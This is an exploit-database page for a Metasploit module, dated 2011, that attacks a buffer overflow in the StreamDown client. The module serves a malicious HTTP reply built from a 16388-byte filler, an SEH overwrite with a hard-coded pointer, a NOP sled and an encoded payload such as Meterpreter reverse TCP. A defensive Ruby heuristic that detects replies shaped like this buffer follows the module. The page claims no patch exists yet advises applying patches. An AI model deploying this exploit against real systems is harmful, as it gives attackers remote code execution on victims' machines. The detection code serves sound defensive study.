StreamDown Buffer over flow universal exploit - exploit.company
Vendor: StreamDown
By: Fady Mohamed Osman
CVSS: N/A
N/A
Buffer Overflow
CWE: 119
Product Name: StreamDown
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

StreamDown Buffer over flow universal exploit

This is a universal exploit for a buffer overflow vulnerability in the StreamDown software. It has been tested against Windows XP SP3 and Windows 7 SP1. Note that the program does not crash when a Meterpreter reverse TCP payload is used; a session is opened instead.

Mitigation:

Apply the latest patches and updates for StreamDown.

Exploit-DB raw data:

##
# $Id: stream_down_BOF.rb 1 2011-12-18 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	# The module runs as an HTTP server and waits for the client to connect.
	include Msf::Exploit::Remote::HttpServer

	def initialize
		super(
			'Name'           => 'StreamDown Buffer over flow universal exploit',
			'Version'        => '$Revision: 1 $',
			'Description'    => 'Stream Down Buffer Overflow universal exploit tested against win xp sp3 and win7 sp1. Also note that the program will not crash in case of meterpreter reverse tcp payload but a session will be opened',
			'Author'         => 'Fady Mohamed Osman',
			'References'     =>
				[
					['URL', 'http://www.dark-masters.tk/']
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'        =>
				{
					'BadChars' => "\x00\xff\x0a"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic',  { } ],
				],
			'DefaultTarget'  => 0,
			'License'        => MSF_LICENSE
		)
	end

	# Called for every request the client makes to the module's URI.
	def on_request_uri(cli, request)
		# Values written over the SEH record: handler pointer and next-SEH field.
		seh = 0x10019448
		nseh = "\xeb\x06\x90\x90"
		# Layout: 16388 filler bytes, the SEH record, 10 NOPs, the encoded payload.
		sploit = "A"*16388 + nseh + [seh].pack('V') + "\x90"*10 + payload.encoded
		# The buffer is written to the socket as-is, with no HTTP status line or headers.
		cli.put(sploit)
		close_client(cli)
	end
end
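
A defender-side check for the reply that on_request_uri sends, as an added example that is not part of the original module or of Metasploit: it flags a server reply whose body is a long single-byte run followed by a short-jump/NOP pair, a 4-byte pointer and a NOP run. The function name, the thresholds and both sample replies are assumptions constructed for illustration, and the sample uses a placeholder pointer and placeholder text in place of a payload.

```ruby
# Added example: heuristic for replies shaped like the buffer built above.
MIN_FILLER = 1024 # assumed threshold: shortest single-byte run worth flagging
MIN_SLED   = 8    # assumed threshold: shortest NOP run after the pointer

# Returns a hash of indicators, or nil when the reply does not match the layout.
def inspect_reply(raw)
  data = raw.b
  has_status = data.start_with?("HTTP/".b)
  # If the reply has HTTP headers, inspect only the body after the blank line.
  body = has_status ? (data.split("\r\n\r\n".b, 2)[1] || "".b) : data
  bytes = body.bytes
  return nil if bytes.empty?

  # 1. Filler: how many leading bytes repeat the first byte value.
  filler_len = bytes.index { |b| b != bytes[0] } || bytes.length
  return nil if filler_len < MIN_FILLER

  # 2. Eight bytes shaped like an overwritten SEH record:
  #    short forward jump (0xEB, small offset) padded with two NOPs, then a pointer.
  rec = bytes[filler_len, 8] || []
  return nil if rec.length < 8
  return nil unless rec[0] == 0xEB && rec[1] < 0x80 && rec[2] == 0x90 && rec[3] == 0x90
  handler = rec[4, 4].pack('C4').unpack1('V') # little-endian, as pack('V') wrote it

  # 3. NOP run directly after the pointer.
  sled = bytes[(filler_len + 8)..].take_while { |b| b == 0x90 }.length
  return nil if sled < MIN_SLED

  { filler_len: filler_len, handler: handler, nop_sled: sled,
    missing_status_line: !has_status }
end

# Constructed sample with the module's layout; no real pointer or payload.
SAMPLE_SUSPECT = ("A" * 16388 + "\xEB\x06\x90\x90".b + [0xDEADBEEF].pack('V') +
                  "\x90".b * 10 + "PAYLOAD_PLACEHOLDER").b
# Constructed benign reply: ordinary headers and a long but harmless body.
SAMPLE_BENIGN = "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n" + "A" * 20000

if __FILE__ == $0
  p inspect_reply(SAMPLE_SUSPECT)
  p inspect_reply(SAMPLE_BENIGN)
end
```

The missing_status_line field is worth alerting on by itself, since the module writes its buffer to the socket without a status line or headers.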